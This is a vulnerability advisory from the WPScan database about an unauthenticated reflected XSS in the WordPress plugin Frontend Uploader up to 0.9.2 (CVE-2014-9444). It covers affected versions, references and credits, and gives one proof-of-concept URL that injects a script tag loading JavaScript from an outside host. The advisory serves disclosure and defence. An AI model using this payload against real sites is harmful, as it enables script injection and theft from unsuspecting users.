Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)



Proof of Concept 
http://localhost:8080/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E

Affects Plugin

frontend-uploader
fixed in version 0.9.4

References

CVE 2014-9444
PACKETSTORM 129749

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher SECUPENT
Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 1909
Verified Yes
WPVDB ID 7742

Timeline

Publicly Published 2014-12-27 (about 4 years ago)
Added 2015-01-03 (about 4 years ago)
Last Updated 2019-01-07 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.